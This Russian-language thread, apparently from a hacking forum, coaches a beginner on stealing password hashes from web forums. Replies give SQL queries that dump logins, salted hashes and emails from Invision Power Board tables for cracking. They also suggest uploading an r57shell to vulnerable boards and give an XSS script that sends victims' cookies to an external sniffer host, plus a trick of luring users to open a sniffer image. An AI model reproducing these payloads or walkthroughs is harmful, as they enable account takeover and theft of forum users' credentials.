Объясните мне пожалуйста: Как витянуть хеш от пароля. Ато ломать хешы научился а как их вытянуть не знаю.
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Как вытягивать хеш
- Автор темы hawk2000
- Дата начала
hawk2000
Тебе нужен доступ к базе/файлу где хранятся эти самые хэши.
А вообще вопрос слишком обопщенный, от чего именно тебе нужны хэши?
Тебе нужен доступ к базе/файлу где хранятся эти самые хэши.
А вообще вопрос слишком обопщенный, от чего именно тебе нужны хэши?
Если хеш у тебя уже на руках,то тебе нужно большой хороший словарь и программу для расшифровки хеша. Например PasswordsPro (Встроенный инструмент Hash generator позволяет генерировать хэши 10 типов: MySQL, MD4, MD4 (Base64), MD5, MD5 (Base64), MD5 (Unix), MD5 (APR), MD5 (RAdmin 2.x), SHA-1 and SHA-1 (Base64))
Ещё есть такие программы как BruteHash и MВ5Inside
2Mail2k
MD5Inside (возможно, описка?)
Кроме того, MD5Inside есть ни что иное, как старая версия PassworPro
2hawk2000
тема хэша не раскрыта. Попродробней плз
Кстати, если кому понадобиться.
Допустим, вы залили на дырявый инвижен r57shell, выполнили в БД запрос SELECT * FROM ibf_members_converge
т.е. стянули базу с паролями и солями Данный скрипт поможет преобразовать html-файлик в txt, понятный passwordpro
MD5Inside (возможно, описка?)
Кроме того, MD5Inside есть ни что иное, как старая версия PassworPro
2hawk2000
тема хэша не раскрыта. Попродробней плз
Кстати, если кому понадобиться.
Допустим, вы залили на дырявый инвижен r57shell, выполнили в БД запрос SELECT * FROM ibf_members_converge
т.е. стянули базу с паролями и солями
Данный скрипт поможет преобразовать html-файлик в txt, понятный passwordproВообще хеш можно достать из cookies. Их, в свою очередь, через сниффер. Почитать можно, например, на http://antichat.ru/sniff/
Но все-таки интересует конкретный случай.
Но все-таки интересует конкретный случай.
- Автор темы
- Добавить закладку
- #6
Как ломать хешы я знаю. У меня есть и MD5inside и Passwords Pro и словари.
Но как вытянуть хеш из форума например. В смысле как получить доступ к етой базе\файлу где хранятся хешы.
Но как вытянуть хеш из форума например. В смысле как получить доступ к етой базе\файлу где хранятся хешы.
Ну я говорю.. к примеру, заставить человека открыть картинку-сниффер того же античата. Затем глянуть в лог. Но катит эта тема не всегда, поэтому гораздо эффективнее будет найти/заюзать уязвимость, позволяющую получить md5-хэш)
- Автор темы
- Добавить закладку
- #8
И в логе должен быть Логин\хеш ?
Как создать такой сниффер? И Cgi запрос?
Пароли для мыла тоже шыфруютса хешем?
Если да то хранятся ли ети хешы в cookies?
Как создать такой сниффер? И Cgi запрос?
Пароли для мыла тоже шыфруютса хешем?
Если да то хранятся ли ети хешы в cookies?
n1†R0x
Не, немного сложнее надо заставить человека открыть картинку-сниффер, но на том хосте с которого надо украсть хэш.
hawk2000
Попрактикуйся со старым сплоитом от r57, большенство форумов уже пропатчено, но бажными могут оказаться IPB 1.3, сплоит в атаче.
З.Ы. N1TR0X это я не тебе объяснял, просто тебя поправил, а то не правельно поймеш.
[mod][N1TR0X:] да все как раз правильно, я про это забыл упомянуть))[/mod]
Не, немного сложнее надо заставить человека открыть картинку-сниффер, но на том хосте с которого надо украсть хэш.
hawk2000
Попрактикуйся со старым сплоитом от r57, большенство форумов уже пропатчено, но бажными могут оказаться IPB 1.3, сплоит в атаче.
З.Ы. N1TR0X это я не тебе объяснял, просто тебя поправил, а то не правельно поймеш.
[mod][N1TR0X:] да все как раз правильно, я про это забыл упомянуть))[/mod]
- Автор темы
- Добавить закладку
- #10
Как можно поставить картинку на хост? Надо както ломать сайт?
Как можно найти уязвимость?
Как можно найти уязвимость?
hawk2000
Прочитай статью и все вопросы отпадут (покрайней мере по поводу php снифферов).
Прочитай статью и все вопросы отпадут (покрайней мере по поводу php снифферов).
Я там скрипт выкладывал, дабы HTML преобразовать в txt для passwordpro...
Вобщем, главное правильно составить запрос к базе данных, и никаких скриптов не понадобиться
Для IPB 1.3
Вернет все записи ввиде логин:пароль. Такой формат понимает passwordpro.
Для IPB 2.x.x
Вернет записи ввиде id:соленый хэш:соль:мыло. Такой формат понимает новый passwordpro, работающий с солеными хэшами.
Полученные странички сохраняем, смотрим листером и копируем нужную нам инфу. Скармливаем passwordpro.
ЗЫ: Примеры запросов приведены для СУБД MySQL. Для других СУБД запрос нужно подкорректировать по стандарту SQL.
Вобщем, главное правильно составить запрос к базе данных, и никаких скриптов не понадобиться
Для IPB 1.3
Код:
SELECT CONCAT(name,':',password) FROM `ibf_members`Для IPB 2.x.x
Код:
SELECT CONCAT(converge_id,':',converge_pass_hash,':',converge_pass_salt,'::',converge_email) FROM `ibf_members_converge`Полученные странички сохраняем, смотрим листером и копируем нужную нам инфу. Скармливаем passwordpro.
ЗЫ: Примеры запросов приведены для СУБД MySQL. Для других СУБД запрос нужно подкорректировать по стандарту SQL.
Вобщем можно подвести итог...Есть три способа, для вытаскивания хеша:
1. Через cokies - подсунуть линк использующий xss и ссылающийся на снифер,
2. Через дамп
3. Через запрос к бд
Какой использовать - решать тебе, смотри по своим способностям...Но далеко не факт, что ты сможешь расшифровать хеш
1. Через cokies - подсунуть линк использующий xss и ссылающийся на снифер,
2. Через дамп
3. Через запрос к бд
Какой использовать - решать тебе, смотри по своим способностям...Но далеко не факт, что ты сможешь расшифровать хеш
И что ж: такие темы ещё обсуждают? Как стянуть хэш?!!! Да, это и объяснять не надо и так уже в Сети полно материалов. Тема для начинающих взломщиков!
Хэш ты можешь стянуть многими способами. Самый актуальный это через XSS.
Картинку на сайт можешь залить, как аватар/attach. В самой картинке пишешь
Затем даёшь посмотреть её жертве.
Если форум бажный, можешь глянуть сплоиты под него, постарайся определить версию форума. Сплоиты найти можешь на www.milw0rm.com.
Как найти уязвимость?) Мдя ... вопрос всех времён. Всё зависит от твоих знаний/умений/навыков. Здесь я тебе ни чем не могу помочь, разве что читай статьи/посты на форумах. В помощь тебе сканеры на уязвимости. Они тебе только облегчат нудную работу.
Советую почитать статьи по SQL, XSS. Линки давать не буду, их и так хватает.
Картинку на сайт можешь залить, как аватар/attach. В самой картинке пишешь
Код:
<script>img = new Image(); img.src = " http://xss.pro/sources/sniff/sniff.png" document.cookie;</script>Если форум бажный, можешь глянуть сплоиты под него, постарайся определить версию форума. Сплоиты найти можешь на www.milw0rm.com.
Как найти уязвимость?) Мдя ... вопрос всех времён. Всё зависит от твоих знаний/умений/навыков. Здесь я тебе ни чем не могу помочь, разве что читай статьи/посты на форумах. В помощь тебе сканеры на уязвимости. Они тебе только облегчат нудную работу.
Конечно нужно, выбор за тобой "как" именно
Советую почитать статьи по SQL, XSS. Линки давать не буду, их и так хватает.
Вообще глупый вопрос, вытянуть хэш от пароля никак. Или подобрать или найти коллозию.
Если юзер под IE в Инете, то XSS самый верный ход.
Народ обьясните пожалуйста как получить хэш из куков IPB присылаемых сниффером ? А то я никогда раньше этим не занимался :mellow:
Например присылает урл типа s=fc0d3597c06d0bdfbacdd186668b79a9&showtopic=1557&st=40
Как вычислить хэш
Например присылает урл типа s=fc0d3597c06d0bdfbacdd186668b79a9&showtopic=1557&st=40
Как вычислить хэш
люди! Как а Вобле сделать снифер, который выдирает хэш с солью?
http://www.exploit.in/materials_/vBulletin.txt
Вот так кажись и не забудь нажать спасибо !!!!11111одинодин
Вот так кажись и не забудь нажать спасибо !!!!11111одинодин